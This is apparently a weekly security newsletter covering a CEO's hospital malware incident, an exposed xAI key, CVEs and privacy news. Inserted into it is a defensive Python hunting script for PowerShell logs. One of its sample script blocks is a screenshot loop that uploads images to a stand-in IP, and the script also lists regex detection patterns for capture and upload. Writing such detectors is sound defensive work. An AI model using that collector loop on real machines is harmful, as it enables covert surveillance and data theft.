Weekly Summary

SPOTLIGHT, VULNERABILITY CHAT & PRIVACY HEADLINES

When CEOs Hack, xAI Fumbles, and Your iPhone Becomes a Brick.

05 May 2025
BREACHAWARE HQ

A total of 22 breaches were found and analysed, resulting in 19,421,865 leaked accounts containing a total of 35 different data types. The breaches found publicly and freely available included ULP Alien TxT File - Episode 11, Doxagram, Grayscale, Underworld Empire Forums and ULP 0017. Sign in to view the full BreachAware Breach Index which includes, where available, reference articles relating to each breach.

SPOTLIGHT

In an astonishing case of “what not to do as a cybersecurity professional,” Jeffery Bowie, CEO of a small infosec firm, has landed in serious trouble after trying to install malware at St. Anthony Hospital in Oklahoma City. Hospital staff caught Bowie acting suspiciously on both a staff computer and a guest computer. When questioned, he claimed to be visiting a family member.

Specialists later discovered malware on one of the machines: a PowerShell script set to take screenshots every 20 minutes and send them to a remote host. Bowie, instead of keeping quiet and speaking to legal counsel, went full damage control via LinkedIn. His post admitted the malware was written “on the fly” using public-access computers and added this gem:

“I wouldn’t have touched a single device had my botched mental health treatment not induced delusions/paranoia.”

He claimed the malware was removed after collecting screenshots of a DFIR host and complained that the incident cost him $12K in revenue. He wrapped up the post by pitching himself to media outlets but only if they’re willing to pay him via CashApp or Apple Cash. Incredible scenes.
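The behaviour described above, a PowerShell script that captures the screen on a timer and ships the images to a remote host, is something worth hunting for in PowerShell script block logging (Windows event 4104). The following is an added example, not the page's code and not the script from the incident: the sample script blocks are constructed stand-ins, and the indicator lists are assumptions about how such a collector is typically written in PowerShell rather than signatures taken from the case.

```python
"""Heuristic hunt over PowerShell script block logs for a screen-capture loop
that uploads to a remote host.

Added example; not code from the page or from the incident. The script blocks
below are constructed stand-ins (the actual script found at the hospital is
not reproduced here), and the indicator lists are assumptions about how such
collectors are typically written in PowerShell, not signatures from the case.
"""
import re

# Constructed script block texts, in the shape of event 4104 ScriptBlockText.
SAMPLE_BLOCKS = {
    "inventory-upload": r"""
        Get-ChildItem C:\Logs | Compress-Archive -DestinationPath C:\Temp\logs.zip
        Invoke-WebRequest -Uri https://intranet.example/upload -Method Post -InFile C:\Temp\logs.zip
    """,
    "screenshot-collector": r"""
        Add-Type -AssemblyName System.Drawing
        while ($true) {
          $b = [System.Drawing.Bitmap]::new(1920, 1080)
          $g = [System.Drawing.Graphics]::FromImage($b)
          $g.CopyFromScreen(0, 0, 0, 0, $b.Size)
          $b.Save("$env:TEMP\s.png")
          (New-Object Net.WebClient).UploadFile("http://203.0.113.5/up", "$env:TEMP\s.png")
          Start-Sleep -Seconds 1200
        }
    """,
    "helpdesk-screenshot": r"""
        Add-Type -AssemblyName System.Drawing
        $b = New-Object System.Drawing.Bitmap 800, 600
        [System.Drawing.Graphics]::FromImage($b).CopyFromScreen(0, 0, 0, 0, $b.Size)
        $b.Save("$env:USERPROFILE\Pictures\shot.png")
    """,
}

# Indicator families (assumed, not from the incident). A hit in one family
# alone is common in legitimate admin tooling; capture plus upload is the
# combination worth an analyst's time, and a sleep loop on top of that
# points at a collector rather than a one-off.
CAPTURE = [r"CopyFromScreen", r"System\.Drawing\.Bitmap", r"Graphics\]::FromImage"]
UPLOAD = [r"\.UploadFile\(", r"\.UploadData\(", r"\.UploadString\(",
          r"Invoke-(WebRequest|RestMethod)[^\n]*-Method\s+Post", r"-InFile\s"]
LOOP = [r"while\s*\(\s*\$true\s*\)", r"Start-Sleep\s+-Seconds\s+\d+", r"Register-ScheduledJob"]


def score_block(text):
    """Return (verdict, matched indicators) for one script block."""
    found = {
        "capture": [p for p in CAPTURE if re.search(p, text, re.IGNORECASE)],
        "upload": [p for p in UPLOAD if re.search(p, text, re.IGNORECASE)],
        "loop": [p for p in LOOP if re.search(p, text, re.IGNORECASE)],
    }
    if found["capture"] and found["upload"]:
        verdict = "high" if found["loop"] else "medium"
    elif found["capture"] or found["upload"]:
        verdict = "low"
    else:
        verdict = "none"
    return verdict, found


def hunt(blocks):
    """Map each script block name to its verdict."""
    return {name: score_block(text)[0] for name, text in blocks.items()}


if __name__ == "__main__":
    for name, text in SAMPLE_BLOCKS.items():
        verdict, found = score_block(text)
        print(f"{name:22} {verdict:6} {found}")
```

Feed it the ScriptBlockText field of exported 4104 events. Screen capture on its own is deliberately scored only "low", because helpdesk and screenshot tooling use the same .NET calls; the signal is the combination with an outbound upload and a sleep loop, which is exactly what a 20-minute collector looks like.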

Elon Musk’s AI startup xAI has suffered a serious internal blunder. A developer accidentally published a private xAI API key in a public GitHub repository; the key could have granted access to proprietary, unreleased models, including ones associated with SpaceX, Tesla, and X (formerly Twitter). The key was found and reported by GitGuardian, but it took xAI nearly two months to respond and revoke the exposed credential.

That kind of delay in revoking a credential of that sensitivity has raised eyebrows, especially considering the fierce competition in the LLM space. There is no confirmation yet of whether the key was ever used, but you can bet rival companies were paying close attention.

Apple has quietly patched a nasty vulnerability in its Darwin notifications system, a legacy API still used across iOS. Exploiting it could send an iPhone into an endless reboot cycle, effectively bricking the device, and it only required a single line of malicious code to trigger.

The bug was responsibly disclosed by a security researcher, who received a $17,500 bounty from Apple. The update has already been rolled out, so make sure your device is running the latest iOS version or risk your iPhone turning into an overpriced paperweight.


VULNERABILITY CHAT

Researchers at Oligo have uncovered a set of security vulnerabilities, now patched, in Apple’s AirPlay protocol. Dubbed AirBorne, the flaws posed a serious risk by potentially allowing attackers to hijack vulnerable devices that rely on the proprietary wireless technology.

A newly disclosed vulnerability in Webmin lets remote, authenticated attackers escalate privileges and execute code with root-level access. In a forum update, the Webmin project emphasised the urgency of the 2.302 release, describing it as “high priority” while also introducing improvements to SSH server management and the firewall rule APIs.

Apache Parquet’s Java library has also come under scrutiny after the disclosure of a vulnerability that can be exploited through specially crafted Parquet files. An advisory from the Apache Software Foundation confirms that schema parsing in the parquet-avro module up to and including version 1.15.0 may allow attackers to run arbitrary code; the fix is in 1.15.1, and any service that reads Parquet files from untrusted sources should upgrade.

A flaw identified by ReliaQuest in SAP NetWeaver Visual Composer has led to confirmed breaches at multiple organisations. Researchers warn that over 7,500 SAP NetWeaver Application Servers remain exposed to the internet, heightening the risk of further compromise.

In a concerning development, Sansec has revealed a supply chain attack affecting 21 widely used e-commerce applications. The attack has enabled hackers to gain full control over hundreds of online stores, with estimates indicating that between 500 and 1,000 stores are running compromised software. Among the victims is a $40 billion multinational retailer, and active exploitation has been observed since at least April 20, 2025.

Eight Common Vulnerabilities and Exposures (CVEs) were added to the Cybersecurity and Infrastructure Security Agency's (CISA) 'Known Exploited Vulnerabilities Catalog' last week, covering:
- Broadcom, Brocade Fabric OS
- Qualitia, Active! Mail
- Commvault, Web Server
- SAP, NetWeaver
- Apache, HTTP Server
- SonicWall, SMA100 Appliances
- Commvault, Command Center
- Yiiframework, Yii
See the full catalog here: https://www.cisa.gov/known-exploited-vulnerabilities-catalog
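The catalog is only useful if it is checked against what you actually run, and the JSON feed CISA publishes alongside it makes that a short script. The following is an added example, not BreachAware's code: it parses a document in the KEV feed's shape, pulls the records added in a given seven-day window and cross-references them with a local vendor/product inventory. The sample records are constructed so the script runs offline; the vendor and product names follow the list above, but the CVE identifiers, dates and descriptions are placeholders rather than real catalog entries.

```python
"""List the entries added to the CISA KEV catalog in a given week and match
them against a local product inventory.

Added example; not BreachAware's code. The live feed is published at
https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
(fetch it with urllib and pass the text to parse_kev). The sample below is
constructed so the script runs offline: vendor and product names follow the
newsletter's list, but the CVE IDs, dates and descriptions are placeholders,
not real catalog records.
"""
import json
from datetime import date, timedelta

# Week covered by this issue of the summary (assumed end date).
WEEK_END = date(2025, 5, 4)

SAMPLE_KEV = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "catalogVersion": "2025.05.02",
    "dateReleased": "2025-05-02T12:00:00.0000Z",
    "count": 4,
    "vulnerabilities": [
        # Placeholder records (constructed): IDs, dates and text are not real.
        {"cveID": "CVE-2025-00001", "vendorProject": "SAP", "product": "NetWeaver",
         "vulnerabilityName": "placeholder", "dateAdded": "2025-04-29",
         "shortDescription": "placeholder", "requiredAction": "Apply mitigations per vendor instructions.",
         "dueDate": "2025-05-20", "knownRansomwareCampaignUse": "Unknown", "notes": "", "cwes": []},
        {"cveID": "CVE-2025-00002", "vendorProject": "Commvault", "product": "Command Center",
         "vulnerabilityName": "placeholder", "dateAdded": "2025-04-28",
         "shortDescription": "placeholder", "requiredAction": "Apply mitigations per vendor instructions.",
         "dueDate": "2025-05-19", "knownRansomwareCampaignUse": "Unknown", "notes": "", "cwes": []},
        {"cveID": "CVE-2025-00003", "vendorProject": "SonicWall", "product": "SMA100 Appliances",
         "vulnerabilityName": "placeholder", "dateAdded": "2025-05-01",
         "shortDescription": "placeholder", "requiredAction": "Apply mitigations per vendor instructions.",
         "dueDate": "2025-05-22", "knownRansomwareCampaignUse": "Unknown", "notes": "", "cwes": []},
        {"cveID": "CVE-2025-00004", "vendorProject": "Apache", "product": "HTTP Server",
         "vulnerabilityName": "placeholder", "dateAdded": "2025-03-10",
         "shortDescription": "placeholder", "requiredAction": "Apply mitigations per vendor instructions.",
         "dueDate": "2025-03-31", "knownRansomwareCampaignUse": "Unknown", "notes": "", "cwes": []},
    ],
})


def parse_kev(raw):
    """Return the vulnerability records from a KEV feed document."""
    doc = json.loads(raw)
    return doc["vulnerabilities"]


def added_between(entries, start, end):
    """Records whose dateAdded (YYYY-MM-DD) falls within [start, end], oldest first."""
    hits = [e for e in entries if start <= date.fromisoformat(e["dateAdded"]) <= end]
    return sorted(hits, key=lambda e: (e["dateAdded"], e["cveID"]))


def added_in_week_ending(entries, week_end):
    """The seven-day window ending on week_end, inclusive."""
    return added_between(entries, week_end - timedelta(days=6), week_end)


def match_inventory(entries, inventory):
    """Cross-reference records against (vendor, product) pairs you actually run.
    Vendor must match exactly (case-insensitive); product is a substring match,
    because KEV product names are not normalised ("SMA100 Appliances" vs "SMA100").
    Returns (cveID, vendor, product, dueDate) tuples, one per matching record."""
    hits = []
    for e in entries:
        for vendor, product in inventory:
            if (e["vendorProject"].lower() == vendor.lower()
                    and product.lower() in e["product"].lower()):
                hits.append((e["cveID"], e["vendorProject"], e["product"], e["dueDate"]))
                break
    return hits


if __name__ == "__main__":
    records = parse_kev(SAMPLE_KEV)
    this_week = added_in_week_ending(records, WEEK_END)
    print(f"{len(this_week)} KEV entries added in the week ending {WEEK_END}")
    my_stack = [("SAP", "NetWeaver"), ("SonicWall", "SMA100"), ("Apache", "HTTP Server")]
    for cve, vendor, product, due in match_inventory(this_week, my_stack):
        print(f"  ACTION {cve}: {vendor} {product} (remediation due {due})")
```

The dueDate field is the point of the exercise: KEV entries carry a remediation deadline that federal agencies are bound by and that many private-sector SLAs borrow, so the matched list is effectively a dated work queue rather than a reading list.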

NIST's National Vulnerability Database (NVD), the U.S. government repository of standards-based vulnerability management data represented using the Security Content Automation Protocol (SCAP), published 1,078 vulnerabilities during the last week, bringing the 2025 total to 16,839. For more information visit https://nvd.nist.gov/vuln/search/

INFORMATION PRIVACY HEADLINES

Europe is set to prohibit anonymous cryptocurrency accounts and privacy coins starting in 2027, as part of an expansive new Anti-Money Laundering Regulation. This sweeping reform will bar credit institutions, financial firms, and crypto asset service providers from offering anonymous services or handling privacy-focused tokens, targeting anonymity at the core of token transactions.

Ireland’s Data Protection Commission has hit TikTok with a 530 million euro ($600 million) fine following a four-year probe into data transfers that exposed users to potential surveillance by China. The company responded in a blog post, emphasising that the decision relates to a specific time frame ending in May 2023, before it launched its data localisation effort, Project Clover, which includes constructing three data centres across Europe.

Sam’s Club is transitioning to a register-free, AI-driven shopping model, aiming to streamline the customer experience with fully digital interactions. Yet, this innovation has triggered concern from consumer advocates who warn that such extensive data collection may lead to price manipulation, pushing higher-priced goods while downplaying discounts based on individual shopping profiles.

In a landmark ruling, a Kenyan court has ordered Worldcoin to delete biometric data it collected unlawfully from thousands of citizens. The ruling stems from the company’s use of orbs to scan individuals’ irises in exchange for cryptocurrency, a process deemed illegal due to the absence of meaningful consent and the lack of a required Data Protection Impact Assessment under national law.

Breach Exposure Monitoring | Dark Web Monitoring + Surface Web Monitoring
Scan Any Domain for Free https://breachaware.com/scan

Data Categories Discovered

Contact, Finance, Digital Behaviour, Communication Logs, Academic, Relationships, Sociodemographic, Human Behaviour, Commerce, National Identifiers, Unstructured, Technology, Career, Geolocation.

  • Key Statistics
  • Breaches Discovered
    22
  • Accounts Discovered
    19,421,865
  • Data Types Discovered
    35